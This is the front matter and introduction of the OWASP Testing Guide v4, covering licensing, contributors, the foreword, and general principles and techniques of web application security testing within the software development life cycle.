OWASP Testing Guide v4
Testing Guide 4.0
Project Leaders: Matteo Meucci and Andrew Muller
Creative Commons (CC) Attribution Share-Alike
Free version at http://www.owasp.org

THE ICONS BELOW REPRESENT WHAT OTHER VERSIONS ARE AVAILABLE IN PRINT FOR THIS BOOK TITLE.
ALPHA: "Alpha Quality" book content is a working draft. Content is very rough and in development until the next level of publishing.
BETA: "Beta Quality" book content is the next highest level. Content is still in development until the next publishing.
RELEASE: "Release Quality" book content is the highest level of quality in a book title's lifecycle, and is a final product.

YOU ARE FREE:
To Share - to copy, distribute and transmit the work
To Remix - to adapt the work
UNDER THE FOLLOWING CONDITIONS:
Attribution. You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of the work).
Share Alike. If you alter, transform, or build upon this work, you may distribute the resulting work only under the same, similar or a compatible license.

The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security "visible", so that people and organizations can make informed decisions about application security risks. Everyone is free to participate in OWASP and all of our materials are available under a free and open software license. The OWASP Foundation is a 501(c)(3) not-for-profit charitable organization that ensures the ongoing availability and support for our work.

Table of Contents

0 Foreword by Eoin Keary

1 Frontispiece
About the OWASP Testing Guide Project
About The Open Web Application Security Project

2 Introduction
The OWASP Testing Project
Principles of Testing
Testing Techniques Explained
Deriving Security Test Requirements
Security Tests Integrated in Development and Testing Workflows
Security Test Data Analysis and Reporting

3 The OWASP Testing Framework
Overview
Phase 1: Before Development Begins
Phase 2: During Definition and Design
Phase 3: During Development
Phase 4: During Deployment
Phase 5: Maintenance and Operations
A Typical SDLC Testing Workflow

4 Web Application Security Testing
Introduction and Objectives
Testing Checklist
Information Gathering
• Conduct Search Engine Discovery and Reconnaissance for Information Leakage (OTG-INFO-001)
• Fingerprint Web Server (OTG-INFO-002)
• Review Webserver Metafiles for Information Leakage (OTG-INFO-003)
• Enumerate Applications on Webserver (OTG-INFO-004)
• Review Webpage Comments and Metadata for Information Leakage (OTG-INFO-005)
• Identify application entry points (OTG-INFO-006)
• Map execution paths through application (OTG-INFO-007)
• Fingerprint Web Application Framework (OTG-INFO-008)
• Fingerprint Web Application (OTG-INFO-009)
• Map Application Architecture (OTG-INFO-010)
Configuration and Deployment Management Testing
• Test Network/Infrastructure Configuration (OTG-CONFIG-001)
• Test Application Platform Configuration (OTG-CONFIG-002)
• Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)
• Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004)
• Enumerate Infrastructure and Application Admin Interfaces (OTG-CONFIG-005)
• Test HTTP Methods (OTG-CONFIG-006)
• Test HTTP Strict Transport Security (OTG-CONFIG-007)
• Test RIA cross domain policy (OTG-CONFIG-008)
Identity Management Testing
• Test Role Definitions (OTG-IDENT-001)
• Test User Registration Process (OTG-IDENT-002)
• Test Account Provisioning Process (OTG-IDENT-003)
• Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004)
• Testing for Weak or unenforced username policy (OTG-IDENT-005)
Authentication Testing
• Testing for Credentials Transported over an Encrypted Channel (OTG-AUTHN-001)
• Testing for default credentials (OTG-AUTHN-002)
• Testing for Weak lock out mechanism (OTG-AUTHN-003)
• Testing for bypassing authentication schema (OTG-AUTHN-004)
• Test remember password functionality (OTG-AUTHN-005)
• Testing for Browser cache weakness (OTG-AUTHN-006)
• Testing for Weak password policy (OTG-AUTHN-007)
• Testing for Weak security question/answer (OTG-AUTHN-008)
• Testing for weak password change or reset functionalities (OTG-AUTHN-009)
• Testing for Weaker authentication in alternative channel (OTG-AUTHN-010)
Authorization Testing
• Testing Directory traversal/file include (OTG-AUTHZ-001)
• Testing for bypassing authorization schema (OTG-AUTHZ-002)
• Testing for Privilege Escalation (OTG-AUTHZ-003)
• Testing for Insecure Direct Object References (OTG-AUTHZ-004)
Session Management Testing
• Testing for Bypassing Session Management Schema (OTG-SESS-001)
• Testing for Cookies attributes (OTG-SESS-002)
• Testing for Session Fixation (OTG-SESS-003)
• Testing for Exposed Session Variables (OTG-SESS-004)
• Testing for Cross Site Request Forgery (CSRF) (OTG-SESS-005)
• Testing for logout functionality (OTG-SESS-006)
• Test Session Timeout (OTG-SESS-007)
• Testing for Session puzzling (OTG-SESS-008)
Input Validation Testing
• Testing for Reflected Cross Site Scripting (OTG-INPVAL-001)
• Testing for Stored Cross Site Scripting (OTG-INPVAL-002)
• Testing for HTTP Verb Tampering (OTG-INPVAL-003)
• Testing for HTTP Parameter pollution (OTG-INPVAL-004)
• Testing for SQL Injection (OTG-INPVAL-005)
  Oracle Testing
  MySQL Testing
  SQL Server Testing
  Testing PostgreSQL (from OWASP BSP)
  MS Access Testing
  Testing for NoSQL injection
• Testing for LDAP Injection (OTG-INPVAL-006)
• Testing for ORM Injection (OTG-INPVAL-007)
• Testing for XML Injection (OTG-INPVAL-008)
• Testing for SSI Injection (OTG-INPVAL-009)
• Testing for XPath Injection (OTG-INPVAL-010)
• IMAP/SMTP Injection (OTG-INPVAL-011)
• Testing for Code Injection (OTG-INPVAL-012)
  Testing for Local File Inclusion
  Testing for Remote File Inclusion
• Testing for Command Injection (OTG-INPVAL-013)
• Testing for Buffer overflow (OTG-INPVAL-014)
  Testing for Heap overflow
  Testing for Stack overflow
  Testing for Format string
• Testing for incubated vulnerabilities (OTG-INPVAL-015)
• Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
Testing for Error Handling
• Analysis of Error Codes (OTG-ERR-001)
• Analysis of Stack Traces (OTG-ERR-002)
Testing for weak Cryptography
• Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection (OTG-CRYPST-001)
• Testing for Padding Oracle (OTG-CRYPST-002)
• Testing for Sensitive information sent via unencrypted channels (OTG-CRYPST-003)
Business Logic Testing
• Test Business Logic Data Validation (OTG-BUSLOGIC-001)
• Test Ability to Forge Requests (OTG-BUSLOGIC-002)
• Test Integrity Checks (OTG-BUSLOGIC-003)
• Test for Process Timing (OTG-BUSLOGIC-004)
• Test Number of Times a Function Can be Used Limits (OTG-BUSLOGIC-005)
• Testing for the Circumvention of Work Flows (OTG-BUSLOGIC-006)
• Test Defenses Against Application Mis-use (OTG-BUSLOGIC-007)
• Test Upload of Unexpected File Types (OTG-BUSLOGIC-008)
• Test Upload of Malicious Files (OTG-BUSLOGIC-009)
Client Side Testing
• Testing for DOM based Cross Site Scripting (OTG-CLIENT-001)
• Testing for JavaScript Execution (OTG-CLIENT-002)
• Testing for HTML Injection (OTG-CLIENT-003)
• Testing for Client Side URL Redirect (OTG-CLIENT-004)
• Testing for CSS Injection (OTG-CLIENT-005)
• Testing for Client Side Resource Manipulation (OTG-CLIENT-006)
• Test Cross Origin Resource Sharing (OTG-CLIENT-007)
• Testing for Cross Site Flashing (OTG-CLIENT-008)
• Testing for Clickjacking (OTG-CLIENT-009)
• Testing WebSockets (OTG-CLIENT-010)
• Test Web Messaging (OTG-CLIENT-011)
• Test Local Storage (OTG-CLIENT-012)

5 Reporting
Appendix A: Testing Tools
Black Box Testing Tools
Appendix B: Suggested Reading
Whitepapers
Books
Useful Websites
Appendix C: Fuzz Vectors
Fuzz Categories
Appendix D: Encoded Injection
Input Encoding
Output Encoding

0 Testing Guide Foreword

Foreword by Eoin Keary, OWASP Global Board

The problem of insecure software is perhaps the most important technical challenge of our time. The dramatic rise of web applications enabling business, social networking and more has only compounded the requirement to establish a robust approach to writing and securing our Internet, web applications and data.

At The Open Web Application Security Project (OWASP), we're trying to make the world a place where insecure software is the anomaly, not the norm. The OWASP Testing Guide has an important role to play in solving this serious issue. It is vitally important that our approach to testing software for security issues is based on the principles of engineering and science. We need a consistent, repeatable and defined approach to testing web applications. A world without some minimal standards in terms of engineering and technology is a world in chaos.

It goes without saying that you can't build a secure application without performing security testing on it. Testing is part of a wider approach to building a secure system. Many software development organizations do not include security testing as part of their standard software development process. What is even worse is that many security vendors deliver testing with varying degrees of quality and rigor.

Security testing, by itself, isn't a particularly good stand-alone measure of how secure an application is, because there are an infinite number of ways that an attacker might be able to make an application break, and it simply isn't possible to test them all. We can't hack ourselves secure, and we only have a limited time to test and defend where an attacker does not have such constraints.

In conjunction with other OWASP projects such as the Code Review Guide, the Development Guide and tools such as OWASP ZAP, this is a great start towards building and maintaining secure applications. The Development Guide will show your project how to architect and build a secure application, the Code Review Guide will tell you how to verify the security of your application's source code, and this Testing Guide will show you how to verify the security of your running application. I highly recommend using these guides as part of your application security initiatives.

Why OWASP?
Creating a guide like this is a huge undertaking, requiring the expertise of hundreds of people around the world. There are many different ways to test for security flaws, and this guide captures the consensus of the leading experts on how to perform this testing quickly, accurately, and efficiently. OWASP gives like-minded security folks the ability to work together and form a leading-practice approach to a security problem.

Having this guide available in a completely free and open way is important for the foundation's mission. It gives anyone the ability to understand the techniques used to test for common security issues. Security should not be a black art or a closed secret that only a few can practice. It should be open to all, and not exclusive to security practitioners but also available to QA, developers and technical managers. The project to build this guide keeps this expertise in the hands of the people who need it: you, me and anyone who is involved in building software.

This guide must make its way into the hands of developers and software testers. There are not nearly enough application security experts in the world to make any significant dent in the overall problem. The initial responsibility for application security must fall on the shoulders of the developers, because they write the code. It shouldn't be a surprise that developers aren't producing secure code if they aren't testing for it or considering the types of bugs which introduce vulnerabilities.

Keeping this information up to date is a critical aspect of this guide project. By adopting the wiki approach, the OWASP community can evolve and expand the information in this guide to keep pace with the fast-moving application security threat landscape. This guide is a great testament to the passion and energy our members and project volunteers have for this subject. It shall certainly help change the world a line of code at a time.

Tailoring and Prioritizing

You should adopt this guide in your organization. You may need to tailor the information to match your organization's technologies, processes, and organizational structure. In general there are several different roles within organizations that may use this guide:
• Developers should use this guide to ensure that they are producing secure code. These tests should be a part of normal code and unit testing procedures.
• Software testers and QA should use this guide to expand the set of test cases they apply to applications. Catching these vulnerabilities early saves considerable time and effort later.
• Security specialists should use this guide in combination with other techniques as one way to verify that no security holes have been missed in an application.
• Project Managers should consider the reason this guide exists: security issues manifest themselves via bugs in code and design.

The most important thing to remember when performing security testing is to continuously re-prioritize. There are an infinite number of possible ways that an application could fail, and organizations always have limited testing time and resources. Be sure time and resources are spent wisely. Try to focus on the security holes that are a real risk to your business. Try to contextualize risk in terms of the application and its use cases.

This guide is best viewed as a set of techniques that you can use to find different types of security holes. But not all the techniques are equally important.
Try to avoid using the guide as a checklist; new vulnerabilities are always emerging, and no guide can be an exhaustive list of "things to test for". Rather, it is a great place to start.

The Role of Automated Tools

There are a number of companies selling automated security analysis and testing tools. Remember the limitations of these tools so that you can use them for what they're good at. As Michael Howard put it at the 2006 OWASP AppSec Conference in Seattle, "Tools do not make software secure! They help scale the process and help enforce policy."

Most importantly, these tools are generic, meaning that they are not designed for your custom code but for applications in general. That means that while they can find some generic problems, they do not have enough knowledge of your application to allow them to detect most flaws. In my experience, the most serious security issues are the ones that are not generic, but deeply intertwined in your business logic and custom application design.

These tools can also be seductive, since they do find lots of potential issues. While running the tools doesn't take much time, each one of the potential problems takes time to investigate and verify. If the goal is to find and eliminate the most serious flaws as quickly as possible, consider whether your time is best spent with automated tools or with the techniques described in this guide. Still, these tools are certainly part of a well-balanced application security program. Used wisely, they can support your overall processes to produce more secure code.

Call to Action

If you're building, designing or testing software, I strongly encourage you to get familiar with the security testing guidance in this document. It is a great road map for testing the most common issues facing applications today, but it is not exhaustive. If you find errors, please add a note to the discussion page or make the change yourself. You'll be helping thousands of others who use this guide.

Please consider joining us as an individual or corporate member so that we can continue to produce materials like this testing guide and all the other great projects at OWASP. Thank you to all the past and future contributors to this guide; your work will help to make applications worldwide more secure.

Eoin Keary, OWASP Board Member, April 19, 2013

1 Testing Guide Frontispiece

"Open and collaborative knowledge: that is the OWASP way." With v4 we realized a new guide that will be the de facto standard guide for performing Web Application Penetration Testing. - Matteo Meucci

OWASP thanks the many authors, reviewers, and editors for their hard work in bringing this guide to where it is today. If you have any comments or suggestions on the Testing Guide, please e-mail the Testing Guide mailing list: http://lists.owasp.org/mailman/listinfo/owasp-testing

Or drop an e-mail to the project leaders: Andrew Muller and Matteo Meucci

Revision History

The Testing Guide v4 will be released in 2014. The Testing Guide originated in 2003 with Dan Cuthbert as one of the original editors. It was handed over to Eoin Keary in 2005 and transformed into a wiki. Matteo Meucci has taken on the Testing Guide and is now the lead of the OWASP Testing Guide Project. Since 2012, Andrew Muller has co-led the project with Matteo Meucci.
• 2014 - "OWASP Testing Guide", Version 4.0
• 15th September, 2008 - "OWASP Testing Guide", Version 3.0
• December 25, 2006 - "OWASP Testing Guide", Version 2.0
• December 2004 - "The OWASP Testing Guide", Version 1.0
• July 14, 2004 - "OWASP Web Application Penetration Checklist", Version 1.1

The OWASP Testing Guide version 4 improves on version 3 in three ways:

[1] This version of the Testing Guide integrates with the two other flagship OWASP documentation products: the Developers Guide and the Code Review Guide. To achieve this we aligned the testing categories and test numbering with those in other OWASP products. The aim of the Testing and Code Review Guides is to evaluate the security controls described by the Developers Guide.

[2] All chapters have been improved and test cases expanded to 87 (64 test cases in v3), including the introduction of four new chapters and controls:
• Identity Management Testing
• Error Handling
• Cryptography
• Client Side Testing

[3] This version of the Testing Guide encourages the community not to simply accept the test cases outlined in this guide. We encourage security testers to integrate with other software testers and devise test cases specific to the target application. As we find test cases that have wider applicability we encourage the security testing community to share them and contribute them to the Testing Guide. This will continue to build the application security body of knowledge and allow the development of the Testing Guide to be an iterative rather than monolithic process.

Copyright and License

Copyright (c) 2014 The OWASP Foundation. This document is released under the Creative Commons 2.5 License. Please read and understand the license and copyright conditions.

Project Leaders
Matteo Meucci
Andrew Muller

Andrew Muller: OWASP Testing Guide Lead since 2013.
Matteo Meucci: OWASP Testing Guide Lead since 2007.
Eoin Keary: OWASP Testing Guide 2005-2007 Lead.
Daniel Cuthbert: OWASP Testing Guide 2003-2005 Lead.

v4 Authors
• Matteo Meucci • Pavol Luptak • Marco Morana • Giorgio Fedon • Stefano Di Paola • Gianrico Ingrosso • Giuseppe Bonfà • Andrew Muller • Robert Winkel • Roberto Suggi Liverani • Robert Smith • Tripurari Rai

v4 Reviewers
• Davide Danelon • Andrea Rosignoli • Irene Abezgauz • Lode Vanstechelman • Sebastien Gioria • Yiannis Pavlosoglou • Aditya Balapure

v2 Authors
• Vicente Aguilera • Mauro Bregolin • Tom Brennan • Gary Burns • Luca Carettoni • Dan Cornell • Mark Curphey • Daniel Cuthbert • Sebastien Deleersnyder • Stephen DeVries

v2 Reviewers
• Vicente Aguilera • Marco Belotti • Mauro Bregolin • Marco Cova • Daniel Cuthbert • Paul Davies • Stefano Di Paola • Matteo G.P. Flora
• Simona Forti • Darrell Groundy • Thomas Ryan • Tim Bertels • Cecil Su • Aung KhAnt • Norbert Szetei • Michael Boman • Wagner Elias • Kevin Horvat • Tom Brennan • Tomas Zatko • Juan Galiana Lara • Sumit Siddharth • Mike Hryekewicz • Simon Bennetts • Ray Schippers • Raul Siles • Jayanta Karmakar • Brad Causey • Vicente Aguilera • Ismael Gonçalves • David Fern • Tom Eston • Kevin Horvath • Rick Mitchell

v3 Authors
• Anurag Agarwwal • Daniele Bellucci • Ariel Coronel • Stefano Di Paola • Giorgio Fedon • Adam Goodman • Christian Heinrich • Kevin Horvath • Gianrico Ingrosso • Roberto Suggi Liverani • Kuza55 • Pavol Luptak • Ferruh Mavituna • Marco Mella • Matteo Meucci • Marco Morana • Antonio Parata • Cecil Su • Harish Skanda Sureddy • Mark Roxberry • Andrew Van der Stock • Stefano Di Paola • David Endler • Giorgio Fedon • Javier Fernández-Sanguino • Glyn Geoghegan • Stan Guzik • Madhura Halasgikar • Eoin Keary • David Litchfield • Andrea Lombardini • Eoin Keary • James Kist • Katie McDowell • Marco Mella • Matteo Meucci • Syed Mohamed • Antonio Parata • Alberto Revelli • Mark Roxberry • Dave Wichers • Ralph M. Los • Claudio Merloni • Matteo Meucci • Marco Morana • Laura Nunez • Gunter Ollmann • Antonio Parata • Yiannis Pavlosoglou • Carlo Pelliccioni • Harinath Pudipeddi • Eduardo Castellanos • Simone Onofri • Harword Sheen • Amro AlOlaqi • Suhas Desai • Ryan Dewhurst • Zaki Akhmad • Davide Danelon • Alexander Antukh • Thomas Kalamaris • Alexander Vavousis • Christian Heinrich • Babu Arokiadas • Rob Barnes • Ben Walther • Anant Shrivastava • Colin Watson • Luca Carettoni • Eoin Keary • Jeff Williams • Juan Manuel Bahamonde • Thomas Skora • Irene Abezgauz • Hugo Costa

v3 Reviewers
• Marco Cova • Kevin Fuller • Matteo Meucci • Nam Nguyen • Rick Mitchell • Alberto Revelli • Mark Roxberry • Tom Ryan • Anush Shetty • Larry Shields • Dafydd Studdard • Andrew van der Stock • Ariel Waissbein • Jeff Williams • Tushar Vartak

Trademarks
• Java, Java Web Server, and JSP are registered trademarks of Sun Microsystems, Inc.
• Merriam-Webster is a trademark of Merriam-Webster, Inc.
• Microsoft is a registered trademark of Microsoft Corporation.
• Octave is a service mark of Carnegie Mellon University.
• VeriSign and Thawte are registered trademarks of VeriSign, Inc.
• Visa is a registered trademark of VISA USA.
• OWASP is a registered trademark of the OWASP Foundation.
All other products and company names may be trademarks of their respective owners. Use of a term in this document should not be regarded as affecting the validity of any trademark or service mark.

2 Introduction

The OWASP Testing Project

The OWASP Testing Project has been in development for many years. The aim of the project is to help people understand the what, why, when, where, and how of testing web applications. Writing the Testing Guide has proven to be a difficult task. It was a challenge to obtain consensus and develop content that allowed people to apply the concepts described in the guide, while also enabling them to work in their own environment and culture. It was also a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. However, the group is very satisfied with the results of the project. Many industry experts and security professionals, some of whom are responsible for software security at some of the largest companies in the world, are validating the testing framework.
This framework helps organizations test their web applications in order to build reliable and secure software. The framework is not intended simply to highlight areas of weakness, although the latter is certainly a by-product of many of the OWASP guides and checklists. As such, hard decisions had to be made about the appropriateness of certain testing techniques and technologies. The group fully understands that not everyone will agree upon all of these decisions. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience.

The rest of this guide is organized as follows: this introduction covers the prerequisites of testing web applications and the scope of testing. It also covers the principles of successful testing and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing.

Measuring Security: the Economics of Insecure Software

A basic tenet of software engineering is that you can't control what you can't measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. This topic will not be covered in detail here, as it would take a guide on its own (for an introduction, see [2]).

One aspect that should be emphasized is that security measurements are about both the specific technical issues (e.g., how prevalent a certain vulnerability is) and how these issues affect the economics of software. Most technical people will at least understand the basic issues, or they may have a deeper understanding of the vulnerabilities. Sadly, few are able to translate that technical knowledge into monetary terms and quantify the potential cost of vulnerabilities to the application owner's business. Until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security.

While estimating the cost of insecure software may appear a daunting task, there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards and Technology (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts.

The framework described in this document encourages people to measure security throughout the entire development process.
They can then relate the cost of insecure software to the impact it has on the business, and consequently develop appropriate business processes and assign resources to manage the risk. Remember that measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet.

What is Testing?

During the development life cycle of a web application many things need to be tested, but what does testing actually mean? The Merriam-Webster Dictionary describes testing as:
• To put to test or proof.
• To undergo a test.
• To be assigned a standing or evaluation based on tests.

For the purposes of this document, testing is a process of comparing the state of a system or application against a set of criteria. In the security industry people frequently test against a set of mental criteria that are neither well defined nor complete. As a result of this, many outsiders regard security testing as a black art. The aim of this document is to change that perception and to make it easier for people without in-depth security knowledge to make a difference in testing.

Why Perform Testing?

This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that need to be undertaken to build and operate a testing program on web applications. The guide gives a broad view of the elements required to make a comprehensive web application security program. This guide can be used as a reference guide and as a methodology to help determine the gap between existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, to understand the magnitude of resources required to test and maintain software, or to prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review, will be covered in the remaining parts of this document.

When to Test?

Most people today don't test software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artefacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model.

Figure 1: Generic SDLC Model (define, design, develop, deploy, maintain)

Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process.

What to Test?

It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that "create" software, then it is logical that these are the factors that must be tested.
Today most people generally test the technology or the software itself. An effective testing program should have components that test:
• People – to ensure that there is adequate education and awareness;
• Process – to ensure that there are adequate policies and standards and that people know how to follow these policies;
• Technology – to ensure that the process has been effective in its implementation.

Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment.

Denis Verdon, Head of Information Security at Fidelity National Financial, presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: "If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft."

Feedback and Comments

As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate.

Principles of Testing

There are some common misconceptions when developing a testing methodology to find security bugs in software. This chapter covers some of the basic principles that professionals should take into account when performing security tests on software.

There is No Silver Bullet

While it is tempting to think that a security scanner or application firewall will provide many defenses against attack or identify a multitude of problems, in reality there is no silver bullet to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments or providing adequate test coverage. Remember that security is a process and not a product.

Think Strategically, Not Tactically

Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990s. The patch-and-penetrate model involves fixing a reported bug, but without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. For more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that with the reaction time of attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year.

There are several incorrect assumptions in the patch-and-penetrate model. Many users believe that patches interfere with normal operations and might break existing applications. It is also incorrect to assume that all users are aware of newly released patches.
Consequently, not all users of a product will apply patches, either because they think patching may interfere with how the software works or because they lack knowledge about the existence of the patch.

Figure 2: Window of Vulnerability. The figure charts risk level over time through the following stages: a security vulnerability is discovered; the vulnerability is known to the vendor; the vendor notifies its clients (sometimes); the vulnerability is made public; security tools are updated (IDS signatures, new modules for VA tools); a patch is published; the existence of the patch is widely known; the patch is installed in all affected systems.

It is essential to build security into the Software Development Life Cycle (SDLC) to prevent reoccurring security problems within an application. Developers can build security into the SDLC by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk.

The SDLC is King

The SDLC is a process that is well-known to developers. By integrating security into each phase of the SDLC, it allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program.

There are several secure SDLC frameworks that provide both descriptive and prescriptive advice. Whether a person takes descriptive or prescriptive advice depends on the maturity of the SDLC process. Essentially, prescriptive advice shows how the secure SDLC should work, and descriptive advice shows how it is used in the real world. Both have their place. For example, if you don't know where to start, a prescriptive framework can provide a menu of potential security controls that can be applied within the SDLC. Descriptive advice can then help drive the decision process by presenting what has worked well for other organizations. Descriptive secure SDLCs include BSIMM-V; prescriptive secure SDLCs include OWASP's Open Software Assurance Maturity Model (OpenSAMM) and ISO/IEC 27034 Parts 1-8, parts of which are still in development.

Test Early and Test Often

When a bug is detected early within the SDLC it can be addressed faster and at a lower cost. A security bug is no different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the development and QA teams about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages can help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of the threats that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker's perspective. This allows each organization to consider security issues as part of their existing responsibilities.

Understand the Scope of Security

It is important to know how much security a given project will require.
The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., confidential, secret, top secret). Discussions should occur with legal counsel to ensure that any specific security requirements will be met. In the USA, requirements might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives may apply. For example, Directive 95/46/EC [10] makes it mandatory to treat personal data in applications with due care, whatever the application.

Develop the Right Mindset

Successfully testing an application for security vulnerabilities requires thinking "outside of the box." Normal use cases will test the normal behavior of the application when a user is using it in the manner that is expected. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find what assumptions made by web developers are not always true and how they can be subverted. One of the reasons why automated tools are actually bad at automatically testing for vulnerabilities is that this creative thinking must be done on a case-by-case basis, as most web applications are being developed in a unique way (even when using common frameworks).

Understand the Subject

One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, etc., should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use cases. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization's applications and network (e.g., IDS systems).

Use the Right Tools

While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. However, it is important to understand exactly what these tools can and cannot do so that they are not oversold or used incorrectly.

The Devil is in the Details

It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positives that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities.
Use Source Code When Available

While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in a production environment, they are not the most effective or efficient way to secure an application. It is difficult for dynamic testing to test the entire code base, particularly if many nested conditional statements exist. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement.

Develop Metrics

An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. Good metrics will show:
• If more education and training are required;
• If there is a particular security mechanism that is not clearly understood by the development team;
• If the total number of security related problems being found each month is going down.

Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations is a good starting point.

Document the Test Results

To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they were performed, and details of the test findings. It is wise to agree on an acceptable format for the report which is useful to all concerned parties, which may include developers, project management, business owners, IT department, audit, and compliance. The report should be clear to the business owner in identifying where material risks exist and sufficient to get their backing for subsequent mitigation actions. The report should also be clear to the developer in pin-pointing the exact function that is affected by the vulnerability and associated recommendations for resolving issues in a language that the developer will understand. The report should also allow another security tester to reproduce the results. Writing the report should not be overly burdensome on the security tester themselves. Security testers are not generally renowned for their creative writing skills, and agreeing on a complex report can lead to instances where test results do not get properly documented. Using a security test report template can save time and ensure that results are documented accurately and consistently, and are in a format that is suitable for the audience.

Testing Techniques Explained

This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques as this information is covered in Chapter 3. This section is included to provide context for the framework presented in the next chapter and to highlight the advantages and disadvantages of some of the techniques that should be considered.
In particular, we will cover:
• Manual Inspections & Reviews
• Threat Modeling
• Code Review
• Penetration Testing

Manual Inspections & Reviews

Overview
Manual inspections are human reviews that typically test the security implications of people, policies, and processes. Manual inspections can also include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. By asking someone how something works and why it was implemented in a specific way, the tester can quickly determine if any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews it is recommended that a trust-but-verify model is adopted. Not everything that the tester is shown or told will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.

Advantages:
• Requires no supporting technology
• Can be applied to a variety of situations
• Flexible
• Promotes teamwork
• Early in the SDLC

Disadvantages:
• Can be time consuming
• Supporting material not always available
• Requires significant human thought and skill to be effective

Threat Modeling

Overview
